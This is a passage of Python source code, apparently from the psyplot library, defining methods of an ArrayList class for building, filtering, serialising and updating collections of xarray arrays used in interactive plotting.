_get_dims(arr) if not isinstance(arr, ArrayList) else
arr.all_dims
for arr in self]
@property
def is_unstructured(self):
"""A boolean for each array whether it is unstructured or not"""
return [
arr.psy.decoder.is_unstructured(arr)
if not isinstance(arr, ArrayList) else
arr.is_unstructured
for arr in self]
@property
def coords(self):
"""Names of the coordinates of the arrays in this list"""
return set(chain(*(arr.coords for arr in self)))
@property
def coords_intersect(self):
"""Coordinates of the arrays in this list that are used in all arrays
"""
return set.intersection(*map(
set, (getattr(arr, 'coords_intersect', arr.coords) for arr in self)
))
@property
def with_plotter(self):
"""The arrays in this instance that are visualized with a plotter"""
return self.__class__(
(arr for arr in self if arr.psy.plotter is not None),
auto_update=bool(self.auto_update))
no_auto_update = property(_no_auto_update_getter,
doc=_no_auto_update_getter.__doc__)
@no_auto_update.setter
def no_auto_update(self, value):
for arr in self:
arr.psy.no_auto_update = value
self.no_auto_update.value = bool(value)
@property
def logger(self):
""":class:`logging.Logger` of this instance"""
try:
return self._logger
except AttributeError:
name = '%s.%s' % (self.__module__, self.__class__.__name__)
self._logger = logging.getLogger(name)
self.logger.debug('Initializing...')
return self._logger
@logger.setter
def logger(self, value):
self._logger = value
@property
def arrays(self):
"""A list of all the :class:`xarray.DataArray` instances in this list
"""
return list(chain.from_iterable(
([arr] if not isinstance(arr, InteractiveList) else arr.arrays
for arr in self)))
@docstrings.get_sections(base='ArrayList.rename', sections=[
'Parameters', 'Raises'])
@dedent
def rename(self, arr, new_name=True):
"""
Rename an array to find a name that isn't already in the list
Parameters
----------
arr: InteractiveBase
A :class:`InteractiveArray` or :class:`InteractiveList` instance
whose name shall be checked
new_name: bool or str
If False, and the ``arr_name`` attribute of the new array is
already in the list, a ValueError is raised.
If True and the ``arr_name`` attribute of the new array is not
already in the list, the name is not changed. Otherwise, if the
array name is already in use, `new_name` is set to 'arr{0}'.
If not True, this will be used for renaming (if the array name of
`arr` is in use or not). ``'{0}'`` is replaced by a counter
Returns
-------
InteractiveBase
`arr` with changed ``arr_name`` attribute
bool or None
True, if the array has been renamed, False if not and None if the
array is already in the list
Raises
------
ValueError
If it was impossible to find a name that isn't already in the list
ValueError
If `new_name` is False and the array is already in the list"""
name_in_me = arr.psy.arr_name in self.arr_names
if not name_in_me:
return arr, False
elif name_in_me and not self._contains_array(arr):
if new_name is False:
raise ValueError(
"Array name %s is already in use! Set the `new_name` "
"parameter to None for renaming!" % arr.psy.arr_name)
elif new_name is True:
new_name = new_name if isstring(new_name) else 'arr{0}'
arr.psy.arr_name = self.next_available_name(new_name)
return arr, True
return arr, None
docstrings.keep_params('ArrayList.rename.parameters', 'new_name')
docstrings.keep_params('InteractiveBase.parameters', 'auto_update')
@docstrings.get_sections(base='ArrayList')
@docstrings.dedent
def __init__(self, iterable=[], attrs={}, auto_update=None, new_name=True):
"""
Parameters
----------
iterable: iterable
The iterable (e.g. another list) defining this list
attrs: dict-like or iterable, optional
Global attributes of this list
%(InteractiveBase.parameters.auto_update)s
%(ArrayList.rename.parameters.new_name)s"""
super(ArrayList, self).__init__()
self.attrs = OrderedDict(attrs)
if auto_update is None:
auto_update = rcParams['lists.auto_update']
self.auto_update = not bool(auto_update)
# append the data in order to set the correct names
self.extend(filter(
lambda arr: isinstance(getattr(arr, 'psy', None),
InteractiveBase),
iterable), new_name=new_name)
def copy(self, deep=False):
"""Returns a copy of the list
Parameters
----------
deep: bool
If False (default), only the list is copied and not the contained
arrays, otherwise the contained arrays are deep copied"""
if not deep:
return self.__class__(self[:], attrs=self.attrs.copy(),
auto_update=not bool(self.no_auto_update))
else:
return self.__class__(
[arr.psy.copy(deep) for arr in self], attrs=self.attrs.copy(),
auto_update=not bool(self.auto_update))
docstrings.keep_params('InteractiveArray.update.parameters', 'method')
@classmethod
@docstrings.get_sections(base='ArrayList.from_dataset', sections=[
'Parameters', 'Other Parameters', 'Returns'])
@docstrings.dedent
def from_dataset(cls, base, method='isel', default_slice=None,
decoder=None, auto_update=None, prefer_list=False,
squeeze=True, attrs=None, load=False, **kwargs):
"""
Construct an ArrayList instance from an existing base dataset
Parameters
----------
base: xarray.Dataset
Dataset instance that is used as reference
%(InteractiveArray.update.parameters.method)s
%(InteractiveBase.parameters.auto_update)s
prefer_list: bool
If True and multiple variable names pher array are found, the
:class:`InteractiveList` class is used. Otherwise the arrays are
put together into one :class:`InteractiveArray`.
default_slice: indexer
Index (e.g. 0 if `method` is 'isel') that shall be used for
dimensions not covered by `dims` and `furtherdims`. If None, the
whole slice will be used.
decoder: CFDecoder or dict
Arguments for the decoder. This can be one of
- an instance of :class:`CFDecoder`
- a subclass of :class:`CFDecoder`
- a dictionary with keyword-arguments to the automatically
determined decoder class
- None to automatically set the decoder
squeeze: bool, optional
Default True. If True, and the created arrays have a an axes with
length 1, it is removed from the dimension list (e.g. an array
with shape (3, 4, 1, 5) will be squeezed to shape (3, 4, 5))
attrs: dict, optional
Meta attributes that shall be assigned to the selected data arrays
(additional to those stored in the `base` dataset)
load: bool or dict
If True, load the data from the dataset using the
:meth:`xarray.DataArray.load` method. If :class:`dict`, those will
be given to the above mentioned ``load`` method
Other Parameters
----------------
%(setup_coords.parameters)s
Returns
-------
ArrayList
The list with the specified :class:`InteractiveArray` instances
that hold a reference to the given `base`"""
try:
load = dict(load)
except (TypeError, ValueError):
def maybe_load(arr):
return arr.load() if load else arr
else:
def maybe_load(arr):
return arr.load(**load)
def iter_dims(dims):
"""Split the given dictionary into multiples and iterate over it"""
if not dims:
while 1:
yield {}
else:
dims = OrderedDict(dims)
keys = dims.keys()
for vals in zip(*map(cycle, map(safe_list, dims.values()))):
yield dict(zip(keys, vals))
def recursive_selection(key, dims, names):
names = safe_list(names)
if len(names) > 1 and prefer_list:
keys = ('arr%i' % i for i in range(len(names)))
return InteractiveList(
starmap(sel_method, zip(keys, iter_dims(dims), names)),
auto_update=auto_update, arr_name=key)
elif len(names) > 1:
return sel_method(key, dims, tuple(names))
else:
return sel_method(key, dims, names[0])
def ds2arr(arr):
base_var = next(var for key, var in arr.variables.items()
if key not in arr.coords)
attrs = base_var.attrs
arr = arr.to_array()
if 'coordinates' in base_var.encoding:
arr.encoding['coordinates'] = base_var.encoding[
'coordinates']
arr.attrs.update(attrs)
return arr
decoder_input = decoder
def get_decoder(arr):
if decoder_input is None:
return CFDecoder.get_decoder(base, arr)
elif isinstance(decoder_input, CFDecoder):
return decoder_input
elif isinstance(decoder_input, dict):
return CFDecoder.get_decoder(base, arr, **decoder_input)
else:
return decoder_input(base)
def add_missing_dimensions(arr):
# add the missing dimensions to the dataset. This is not anymore
# done by default from xarray >= 0.9 but we need it to ensure the
# interactive treatment of DataArrays
missing = set(arr.dims).difference(base.coords) - {'variable'}
for dim in missing:
base[dim] = arr.coords[dim] = np.arange(base.dims[dim])
if squeeze:
def squeeze_array(arr):
return arr.isel(**{dim: 0 for i, dim in enumerate(arr.dims)
if arr.shape[i] == 1})
else:
def squeeze_array(arr):
return arr
if method == 'isel':
def sel_method(key, dims, name=None):
if name is None:
return recursive_selection(key, dims, dims.pop('name'))
elif (isinstance(name, six.string_types) or
not utils.is_iterable(name)):
arr = base[name]
else:
arr = base[list(name)]
add_missing_dimensions(arr)
if not isinstance(arr, xr.DataArray):
arr = ds2arr(arr)
def_slice = slice(None) if default_slice is None else \
default_slice
decoder = get_decoder(arr)
dims = decoder.correct_dims(arr, dims)
dims.update({
dim: def_slice for dim in set(arr.dims).difference(
dims) if dim != 'variable'})
ret = squeeze_array(arr.isel(**dims))
# delete the variable dimension for the idims
dims.pop('variable', None)
ret.psy.init_accessor(arr_name=key, base=base, idims=dims,
decoder=decoder)
return maybe_load(ret)
else:
def sel_method(key, dims, name=None):
if name is None:
return recursive_selection(key, dims, dims.pop('name'))
elif (isinstance(name, six.string_types) or
not utils.is_iterable(name)):
arr = base[name]
else:
arr = base[list(name)]
add_missing_dimensions(arr)
if not isinstance(arr, xr.DataArray):
arr = ds2arr(arr)
# idims will be calculated by the array (maybe not the most
# efficient way...)
decoder = get_decoder(arr)
dims = decoder.correct_dims(arr, dims)
if default_slice is not None:
dims.update({
key: default_slice for key in set(arr.dims).difference(
dims) if key != 'variable'})
kws = dims.copy()
# the sel method does not work with slice objects
if not any(isinstance(idx, slice) for idx in dims.values()):
kws['method'] = method
try:
ret = arr.sel(**kws)
except KeyError:
_fix_times(kws)
ret = arr.sel(**kws)
ret = squeeze_array(ret)
ret.psy.init_accessor(arr_name=key, base=base, decoder=decoder)
return maybe_load(ret)
if 'name' not in kwargs:
default_names = list(
key for key in base.variables if key not in base.coords)
try:
default_names.sort()
except TypeError:
pass
kwargs['name'] = default_names
names = setup_coords(**kwargs)
# check coordinates
possible_keys = ['t', 'x', 'y', 'z', 'name'] + list(base.dims)
for key in set(chain(*six.itervalues(names))):
utils.check_key(key, possible_keys, name='dimension')
instance = cls(starmap(sel_method, six.iteritems(names)),
attrs=base.attrs, auto_update=auto_update)
# convert to interactive lists if an instance is not
if prefer_list and any(
not isinstance(arr, InteractiveList) for arr in instance):
# if any instance is an interactive list, than convert the others
if any(isinstance(arr, InteractiveList) for arr in instance):
for i, arr in enumerate(instance):
if not isinstance(arr, InteractiveList):
instance[i] = InteractiveList([arr])
else: # put everything into one single interactive list
instance = cls([InteractiveList(instance, attrs=base.attrs,
auto_update=auto_update)])
instance[0].psy.arr_name = instance[0][0].psy.arr_name
if attrs is not None:
for arr in instance:
arr.attrs.update(attrs)
return instance
@classmethod
def _get_dsnames(cls, data, ignore_keys=['attrs', 'plotter', 'ds'],
concat_dim=False, combine=False):
"""Recursive method to get all the file names out of a dictionary
`data` created with the :meth`array_info` method"""
def filter_ignores(item):
return item[0] not in ignore_keys and isinstance(item[1], dict)
if 'fname' in data:
return {tuple(
[data['fname'], data['store']] +
([data.get('concat_dim')] if concat_dim else []) +
([data.get('combine')] if combine else []))}
return set(chain(*map(partial(cls._get_dsnames, concat_dim=concat_dim,
combine=combine,
ignore_keys=ignore_keys),
dict(filter(filter_ignores,
six.iteritems(data))).values())))
@classmethod
def _get_ds_descriptions(
cls, data, ds_description={'ds', 'fname', 'arr'}, **kwargs):
def new_dict():
return defaultdict(list)
ret = defaultdict(new_dict)
ds_description = set(ds_description)
for d in cls._get_ds_descriptions_unsorted(data, **kwargs):
try:
num = d.get('num') or d['ds'].psy.num
except KeyError:
raise ValueError(
'Could not find either the dataset number nor the dataset '
'in the data! However one must be provided.')
d_ret = ret[num]
for key, val in six.iteritems(d):
if key == 'arr':
d_ret['arr'].append(d['arr'])
else:
d_ret[key] = val
return ret
@classmethod
def _get_ds_descriptions_unsorted(
cls, data, ignore_keys=['attrs', 'plotter'], nums=None):
"""Recursive method to get all the file names or datasets out of a
dictionary `data` created with the :meth`array_info` method"""
ds_description = {'ds', 'fname', 'num', 'arr', 'store'}
if 'ds' in data:
# make sure that the data set has a number assigned to it
data['ds'].psy.num
keys_in_data = ds_description.intersection(data)
if keys_in_data:
return {key: data[key] for key in keys_in_data}
for key in ignore_keys:
data.pop(key, None)
func = partial(cls._get_ds_descriptions_unsorted,
ignore_keys=ignore_keys, nums=nums)
return chain(*map(lambda d: [d] if isinstance(d, dict) else d,
map(func, six.itervalues(data))))
@classmethod
@docstrings.get_sections(base='ArrayList.from_dict')
@docstrings.dedent
def from_dict(cls, d, alternative_paths={}, datasets=None,
pwd=None, ignore_keys=['attrs', 'plotter', 'ds'],
only=None, chname={}, **kwargs):
"""
Create a list from the dictionary returned by :meth:`array_info`
This classmethod creates an :class:`~psyplot.data.ArrayList` instance
from a dictionary containing filename, dimension infos and array names
Parameters
----------
d: dict
The dictionary holding the data
alternative_paths: dict or list or str
A mapping from original filenames as used in `d` to filenames that
shall be used instead. If `alternative_paths` is not None,
datasets must be None. Paths must be accessible from the current
working directory.
If `alternative_paths` is a list (or any other iterable) is
provided, the file names will be replaced as they appear in `d`
(note that this is very unsafe if `d` is not and OrderedDict)
datasets: dict or list or None
A mapping from original filenames in `d` to the instances of
:class:`xarray.Dataset` to use. If it is an iterable, the same
holds as for the `alternative_paths` parameter
pwd: str
Path to the working directory from where the data can be imported.
If None, use the current working directory.
ignore_keys: list of str
Keys specified in this list are ignored and not seen as array
information (note that ``attrs`` are used anyway)
only: string, list or callable
Can be one of the following three things:
- a string that represents a pattern to match the array names
that shall be included
- a list of array names to include
- a callable with two arguments, a string and a dict such as
.. code-block:: python
def filter_func(arr_name: str, info: dict): -> bool
'''
Filter the array names
This function should return True if the array shall be
included, else False
Parameters
----------
arr_name: str
The array name (i.e. the ``arr_name`` attribute)
info: dict
The dictionary with the array informations. Common
keys are ``'name'`` that points to the variable name
and ``'dims'`` that points to the dimensions and
``'fname'`` that points to the file name
'''
return True or False
The function should return ``True`` if the array shall be
included, else ``False``. This function will also be given to
subsequents instances of :class:`InteractiveList` objects that
are contained in the returned value
chname: dict
A mapping from variable names in the project to variable names
that should be used instead
Other Parameters
----------------
``**kwargs``
Any other parameter from the `psyplot.data.open_dataset` function
%(open_dataset.parameters)s
Returns
-------
psyplot.data.ArrayList
The list with the interactive objects
See Also
--------
from_dataset, array_info"""
pwd = pwd or getcwd()
if only is None:
def only_filter(arr_name, info):
return True
elif callable(only):
only_filter = only
elif isstring(only):
def only_filter(arr_name, info):
return patt.search(arr_name) is not None
patt = re.compile(only)
only = None
else:
def only_filter(arr_name, info):
return arr_name in save_only
save_only = only
only = None
def get_fname_use(fname):
squeeze = isstring(fname)
fname = safe_list(fname)
ret = tuple(f if utils.is_remote_url(f) or osp.isabs(f) else
osp.join(pwd, f)
for f in fname)
return ret[0] if squeeze else ret
def get_name(name):
if not isstring(name):
return list(map(get_name, name))
else:
return chname.get(name, name)
if not isinstance(alternative_paths, dict):
it = iter(alternative_paths)
alternative_paths = defaultdict(partial(next, it, None))
# first open all datasets if not already done
if datasets is None:
replace_concat_dim = 'concat_dim' not in kwargs
replace_combine = 'combine' not in kwargs
names_and_stores = cls._get_dsnames(
d, concat_dim=True, combine=True)
datasets = {}
for fname, (store_mod, store_cls), concat_dim, combine in names_and_stores:
fname_use = fname
got = True
if replace_concat_dim and concat_dim is not None:
kwargs['concat_dim'] = concat_dim
elif replace_concat_dim and concat_dim is None:
kwargs.pop('concat_dim', None)
if replace_combine and combine is not None:
kwargs['combine'] = combine
elif replace_combine and combine is None:
kwargs.pop('combine', None)
try:
fname_use = alternative_paths[fname]
except KeyError:
got = False
if not got or not fname_use:
if fname is not None:
fname_use = get_fname_use(fname)
if fname_use is not None:
datasets[fname] = _open_ds_from_store(
fname_use, store_mod, store_cls, **kwargs)
if alternative_paths is not None:
for fname in set(alternative_paths).difference(datasets):
datasets[fname] = _open_ds_from_store(fname, **kwargs)
elif not isinstance(datasets, dict):
it_datasets = iter(datasets)
datasets = defaultdict(partial(next, it_datasets, None))
arrays = [0] * len(d)
i = 0
for arr_name, info in six.iteritems(d):
if arr_name in ignore_keys or not only_filter(arr_name, info):
arrays.pop(i)
continue
if not {'fname', 'ds', 'arr'}.intersection(info):
# the described object is an InteractiveList
arr = InteractiveList.from_dict(
info, alternative_paths=alternative_paths,
datasets=datasets, chname=chname)
if not arr:
warn("Skipping empty list %s!" % arr_name)
arrays.pop(i)
continue
else:
if 'arr' in info:
arr = info.pop('arr')
elif 'ds' in info:
arr = cls.from_dataset(
info['ds'], dims=info['dims'],
name=get_name(info['name']))[0]
else:
fname = info['fname']
if fname is None:
warn("Could not open array %s because no filename was "
"specified!" % arr_name)
arrays.pop(i)
continue
try: # in case, datasets is a defaultdict
datasets[fname]
except KeyError:
pass
if fname not in datasets:
warn("Could not open array %s because %s was not in "
"the list of datasets!" % (arr_name, fname))
arrays.pop(i)
continue
arr = cls.from_dataset(
datasets[fname], dims=info['dims'],
name=get_name(info['name']))[0]
for key, val in six.iteritems(info.get('attrs', {})):
arr.attrs.setdefault(key, val)
arr.psy.arr_name = arr_name
arrays[i] = arr
i += 1
return cls(arrays, attrs=d.get('attrs', {}))
docstrings.delete_params('get_filename_ds.parameters', 'ds', 'dump')
@docstrings.get_sections(base='ArrayList.array_info')
@docstrings.dedent
def array_info(self, dump=None, paths=None, attrs=True,
standardize_dims=True, pwd=None, use_rel_paths=True,
alternative_paths={}, ds_description={'fname', 'store'},
full_ds=True, copy=False, **kwargs):
"""
Get dimension informations on you arrays
This method returns a dictionary containing informations on the
array in this instance
Parameters
----------
dump: bool
If True and the dataset has not been dumped so far, it is dumped to
a temporary file or the one generated by `paths` is used. If it is
False or both, `dump` and `paths` are None, no data will be stored.
If it is None and `paths` is not None, `dump` is set to True.
%(get_filename_ds.parameters.no_ds|dump)s
attrs: bool, optional
If True (default), the :attr:`ArrayList.attrs` and
:attr:`xarray.DataArray.attrs` attributes are included in the
returning dictionary
standardize_dims: bool, optional
If True (default), the real dimension names in the dataset are
replaced by x, y, z and t to be more general.
pwd: str
Path to the working directory from where the data can be imported.
If None, use the current working directory.
use_rel_paths: bool, optional
If True (default), paths relative to the current working directory
are used. Otherwise absolute paths to `pwd` are used
ds_description: 'all' or set of {'fname', 'ds', 'num', 'arr', 'store'}
Keys to describe the datasets of the arrays. If all, all keys
are used. The key descriptions are
fname
the file name is inserted in the ``'fname'`` key
store
the data store class and module is inserted in the ``'store'``
key
ds
the dataset is inserted in the ``'ds'`` key
num
The unique number assigned to the dataset is inserted in the
``'num'`` key
arr
The array itself is inserted in the ``'arr'`` key
full_ds: bool
If True and ``'ds'`` is in `ds_description`, the entire dataset is
included. Otherwise, only the DataArray converted to a dataset is
included
copy: bool
If True, the arrays and datasets are deep copied
Other Parameters
----------------
%(get_filename_ds.other_parameters)s
Returns
-------
OrderedDict
An ordered mapping from array names to dimensions and filename
corresponding to the array
See Also
--------
from_dict"""
saved_ds = kwargs.pop('_saved_ds', {})
def get_alternative(f):
return next(filter(lambda t: osp.samefile(f, t[0]),
six.iteritems(alternative_paths)), [False, f])
if copy:
def copy_obj(obj):
# try to get the number of the dataset and create only one copy
# copy for each dataset
try:
num = obj.psy.num
except AttributeError:
pass
else:
try:
return saved_ds[num]
except KeyError:
saved_ds[num] = obj.psy.copy(True)
return saved_ds[num]
return obj.psy.copy(True)
else:
def copy_obj(obj):
return obj
ret = OrderedDict()
if ds_description == 'all':
ds_description = {'fname', 'ds', 'num', 'arr', 'store'}
if paths is not None:
if dump is None:
dump = True
paths = iter(paths)
elif dump is None:
dump = False
if pwd is None:
pwd = getcwd()
for arr in self:
if isinstance(arr, InteractiveList):
ret[arr.arr_name] = arr.array_info(
dump, paths, pwd=pwd, attrs=attrs,
standardize_dims=standardize_dims,
use_rel_paths=use_rel_paths, ds_description=ds_description,
alternative_paths=alternative_paths, copy=copy,
_saved_ds=saved_ds, **kwargs)
else:
if standardize_dims:
idims = arr.psy.decoder.standardize_dims(
next(arr.psy.iter_base_variables), arr.psy.idims)
else:
idims = arr.psy.idims
ret[arr.psy.arr_name] = d = {'dims': idims}
if 'variable' in arr.coords:
d['name'] = [list(arr.coords['variable'].values)]
else:
d['name'] = arr.name
if 'fname' in ds_description or 'store' in ds_description:
fname, store_mod, store_cls = get_filename_ds(
arr.psy.base, dump=dump, paths=paths, **kwargs)
if 'store' in ds_description:
d['store'] = (store_mod, store_cls)
if 'fname' in ds_description:
d['fname'] = []
for i, f in enumerate(safe_list(fname)):
if (f is None or utils.is_remote_url(f)):
d['fname'].append(f)
else:
found, f = get_alternative(f)
if use_rel_paths:
f = osp.relpath(f, pwd)
else:
f = osp.abspath(f)
d['fname'].append(f)
if fname is None or isinstance(fname,
six.string_types):
d['fname'] = d['fname'][0]
else:
d['fname'] = tuple(safe_list(fname))
if arr.psy.base.psy._concat_dim is not None:
d['concat_dim'] = arr.psy.base.psy._concat_dim
if arr.psy.base.psy._combine is not None:
d['combine'] = arr.psy.base.psy._combine
if 'ds' in ds_description:
if full_ds:
d['ds'] = copy_obj(arr.psy.base)
else:
d['ds'] = copy_obj(arr.to_dataset())
if 'num' in ds_description:
d['num'] = arr.psy.base.psy.num
if 'arr' in ds_description:
d['arr'] = copy_obj(arr)
if attrs:
d['attrs'] = arr.attrs
ret['attrs'] = self.attrs
return ret
def _get_tnames(self):
"""Get the name of the time coordinate of the objects in this list"""
tnames = set()
for arr in self:
if isinstance(arr, InteractiveList):
tnames.update(arr.get_tnames())
else:
tnames.add(arr.psy.decoder.get_tname(
next(arr.psy.iter_base_variables), arr.coords))
return tnames - {None}
@docstrings.dedent
def _register_update(self, method='isel', replot=False, dims={}, fmt={},
force=False, todefault=False):
"""
Register new dimensions and formatoptions for updating. The keywords
are the same as for each single array
Parameters
----------
%(InteractiveArray._register_update.parameters)s"""
for arr in self:
arr.psy._register_update(method=method, replot=replot, dims=dims,
fmt=fmt, force=force, todefault=todefault)
@docstrings.get_sections(base='ArrayList.start_update')
@dedent
def start_update(self, draw=None):
"""
Conduct the registered plot updates
This method starts the updates from what has been registered by the
:meth:`update` method. You can call this method if you did not set the
`auto_update` parameter when calling the :meth:`update` method to True
and when the :attr:`no_auto_update` attribute is True.
Parameters
----------
draw: bool or None
If True, all the figures of the arrays contained in this list will
be drawn at the end. If None, it defaults to the `'auto_draw'``
parameter in the :attr:`psyplot.rcParams` dictionary
See Also
--------
:attr:`no_auto_update`, update"""
def worker(arr):
results[arr.psy.arr_name] = arr.psy.start_update(
draw=False, queues=queues)
if len(self) == 0:
return
results = {}
threads = [Thread(target=worker, args=(arr,),
name='update_%s' % arr.psy.arr_name)
for arr in self]
jobs = [arr.psy._njobs for arr in self]
queues = [Queue() for _ in range(max(map(len, jobs)))]
# populate the queues
for i, arr in enumerate(self):
for j, n in enumerate(jobs[i]):
for k in range(n):
queues[j].put(arr.psy.arr_name)
for thread in threads:
thread.setDaemon(True)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if draw is None:
draw = rcParams['auto_draw']
if draw:
self(arr_name=[name for name, adraw in six.iteritems(results)
if adraw]).draw()
if rcParams['auto_show']:
self.show()
docstrings.keep_params('InteractiveArray.update.parameters',
'auto_update')
@docstrings.get_sections(base='ArrayList.update')
@docstrings.dedent
def update(self, method='isel', dims={}, fmt={}, replot=False,
auto_update=False, draw=None, force=False, todefault=False,
enable_post=None, **kwargs):
"""
Update the coordinates and the plot
This method updates all arrays in this list with the given coordinate
values and formatoptions.
Parameters
----------
%(InteractiveArray._register_update.parameters)s
%(InteractiveArray.update.parameters.auto_update)s
%(ArrayList.start_update.parameters)s
enable_post: bool
If not None, enable (``True``) or disable (``False``) the
:attr:`~psyplot.plotter.Plotter.post` formatoption in the plotters
``**kwargs``
Any other formatoption or dimension that shall be updated
(additionally to those in `fmt` and `dims`)
Notes
-----
%(InteractiveArray.update.notes)s
See Also
--------
no_auto_update, start_update"""
dims = dict(dims)
fmt = dict(fmt)
vars_and_coords = set(chain(
self.dims, self.coords, ['name', 'x', 'y', 'z', 't']))
furtherdims, furtherfmt = utils.sort_kwargs(kwargs, vars_and_coords)
dims.update(furtherdims)
fmt.update(furtherfmt)
self._register_update(method=method, replot=replot, dims=dims, fmt=fmt,
force=force, todefault=todefault)
if enable_post is not None:
for arr in self.with_plotter:
arr.psy.plotter.enable_post = enable_post
if not self.no_auto_update or auto_update:
self.start_update(draw)
def draw(self):
"""Draws all the figures in this instance"""
for fig in set(chain(*map(
lambda arr: arr.psy.plotter.figs2draw, self.with_plotter))):
self.logger.debug("Drawing figure %s", fig.number)
fig.canvas.draw()
for arr in self:
if arr.psy.plotter is not None:
arr.psy.plotter._figs2draw.clear()
self.logger.debug("Done drawing.")
def __call__(self, types=None, method='isel', fmts=[], **attrs):
"""Get the arrays specified by their attributes
Parameters
----------
types: type or tuple of types
Any class that shall be used for an instance check via
:func:`isinstance`. If not None, the :attr:`plotter` attribute
of the array is checked against this `types`
method: {'isel', 'sel'}
Selection method for the dimensions in the arrays to be used.
If `method` is 'isel', dimension values in `attrs` must correspond
to integer values as they are found in the
:attr:`InteractiveArray.idims` attribute.
Otherwise the :meth:`xarray.DataArray.coords` attribute is used.
fmts: list
List of formatoption strings. Only arrays with plotters who have
this formatoption are returned
``**attrs``
Parameters may be any attribute of the arrays in this instance,
including the matplotlib axes (``ax``), matplotlib figure
(``fig``) and the array name (``arr_name``).
Values may be iterables (e.g. lists) of the attributes to consider
or callable functions that accept the attribute as a value. If the
value is a string, it will be put into a list."""
def safe_item_list(key, val):
return key, val if callable(val) else safe_list(val)
def filter_list(arr):
other_attrs = attrs.copy()
arr_names = other_attrs.pop('arr_name', None)
return ((arr_names is None or (
arr_names(arr.psy.arr_name) if callable(arr_names)
else arr.psy.arr_name in arr_names)) and
len(arr) == len(arr(types=types, method=method,
**other_attrs)))
if not attrs:
def filter_by_attrs(arr):
return True
elif method == 'sel':
def filter_by_attrs(arr):
if isinstance(arr, InteractiveList):
return filter_list(arr)
tname = arr.psy.decoder.get_tname(
next(six.itervalues(arr.psy.base_variables)))
def check_values(arr, key, vals):
if key == 'arr_name':
attr = arr.psy.arr_name
elif key == 'ax':
attr = arr.psy.ax
elif key == 'fig':
attr = getattr(arr.psy.ax, 'figure', None)
else:
try:
attr = getattr(arr, key)
except AttributeError:
return False
if np.ndim(attr): # do not filter for multiple items
return False
if hasattr(arr.psy, 'decoder') and (
arr.name == tname):
try:
vals = np.asarray(vals, dtype=np.datetime64)
except ValueError:
pass
else:
return attr.values.astype(vals.dtype) in vals
if callable(vals):
return vals(attr)
return getattr(attr, 'values', attr) in vals
return all(
check_values(arr, key, val)
for key, val in six.iteritems(
arr.psy.decoder.correct_dims(next(six.itervalues(
arr.psy.base_variables)), attrs, remove=False)))
else:
def check_values(arr, key, vals):
if key == 'arr_name':
attr = arr.psy.arr_name
elif key == 'ax':
attr = arr.psy.ax
elif key == 'fig':
attr = getattr(arr.psy.ax, 'figure', None)
elif key in arr.coords:
attr = arr.psy.idims[key]
else:
try:
attr = getattr(arr, key)
except AttributeError:
return False
if np.ndim(attr): # do not filter for multiple items
return False
if callable(vals):
return vals(attr)
return attr in vals
def filter_by_attrs(arr):
if isinstance(arr, InteractiveList):
return filter_list(arr)
return all(
check_values(arr, key, val)
for key, val in six.iteritems(
arr.psy.decoder.correct_dims(next(six.itervalues(
arr.psy.base_variables)), attrs, remove=False)))
attrs = dict(starmap(safe_item_list, six.iteritems(attrs)))
ret = self.__class__(
# iterable
(arr for arr in self if
(types is None or isinstance(arr.psy.plotter, types)) and
filter_by_attrs(arr)),
# give itself as base and the auto_update parameter
auto_update=bool(self.auto_update))
# now filter for the formatoptions
if fmts:
fmts = set(safe_list(fmts))
ret = self.__class__(
filter(lambda arr: (arr.psy.plotter and
fmts <= set(arr.psy.plotter)),
ret))
return ret
def __contains__(self, val):
try:
name = val if isstring(val) else val.psy.arr_name
except AttributeError:
return False
else:
return name in self.arr_names and (
isstring(val) or self._contains_array(val))
def _contains_array(self, val):
"""Checks whether exactly this array is in the list"""
arr = self(arr_name=val.psy.arr_name)[0]
is_not_list = any(
map(lambda a: not isinstance(a, InteractiveList),
[arr, val]))
is_list = any(map(lambda a: isinstance(a, InteractiveList),
[arr, val]))
# if one is an InteractiveList and the other not, they differ
if is_list and is_not_list:
return False
# if both are interactive lists, check the lists
if is_list:
return all(a in arr for a in val) and all(a in val for a in arr)
# else we check the shapes and values
return arr is val
def _short_info(self, intend=0, maybe=False):
if maybe:
intend = 0
str_intend = ' ' * intend
if len(self) == 1:
return str_intend + "%s%s.%s([%s])" % (
'' if not hasattr(self, 'arr_name') else self.arr_name + ': ',
self.__class__.__module__, self.__class__.__name__,
self[0].psy._short_info(intend+4, maybe=True))
return str_intend + "%s%s.%s([\n%s])" % (
'' if not hasattr(self, 'arr_name') else self.arr_name + ': ',
self.__class__.__module__, self.__class__.__name__,
",\n".join(
'%s' % (
arr.psy._short_info(intend+4))
for arr in self))
def __str__(self):
return self._short_info()
def __repr__(self):
return self.__str__()
def __getitem__(self, key):
"""Overwrites lists __getitem__ by returning an ArrayList if `key` is a
slice"""
if isinstance(key, slice): # return a new ArrayList
return self.__class__(
super(ArrayList, self).__getitem__(key))
else: # return the item
return super(ArrayList, self).__getitem__(key)
if six.PY2: # for compatibility to python 2.7
def __getslice__(self, *args):
return self[slice(*args)]
def next_available_name(self, fmt_str='arr{0}', counter=None):
"""Create a new array out of the given format string
Parameters
----------
format_str: str
The base string to use. ``'{0}'`` will be replaced by a counter
counter: iterable
An iterable where the numbers should be drawn from. If None,
``range(100)`` is used
Returns
-------
str
A possible name that is not in the current project"""
names = self.arr_names
counter = counter or iter(range(1000))
try:
new_name = next(
filter(lambda n: n not in names,
map(fmt_str.format, counter)))
except StopIteration:
raise ValueError(
"{0} already in the list".format(fmt_str))
return new_name
@docstrings.dedent
def append(self, value, new_name=False):
"""
Append a new array to the list
Parameters
----------
value: InteractiveBase
The data object to append to this list
%(ArrayList.rename.parameters.new_name)s
Raises
------
%(ArrayList.rename.raises)s
See Also
--------
list.append, extend, rename"""
arr, renamed = self.rename(value, new_name)
if renamed is not None:
super(ArrayList, self).append(value)
@docstrings.dedent
def extend(self, iterable, new_name=False):
"""
Add further arrays from an iterable to this list
Parameters
----------
iterable
Any iterable that contains :class:`InteractiveBase` instances
%(ArrayList.rename.parameters.new_name)s
Raises
------
%(ArrayList.rename.raises)s
See Also
--------
list.extend, append, rename"""
# extend those arrays that aren't alredy in the list
super(ArrayList, self).extend(t[0] for t in filter(
lambda t: t[1] is not None, (
self.rename(arr, new_name) for arr in iterable)))
def remove(self, arr):
"""Removes an array from the list
Parameters
----------
arr: str or :class:`InteractiveBase`
The array name or the data object in this list to remove
Raises
------
ValueError
If no array with the specified array name is in the list"""
name = arr if isinstance(arr, six.string_types) else arr.psy.arr_name
if arr not in self:
raise ValueError(
"Array {0} not in the list".format(name))
for i, arr in enumerate(self):
if arr.psy.arr_name == name:
del self[i]
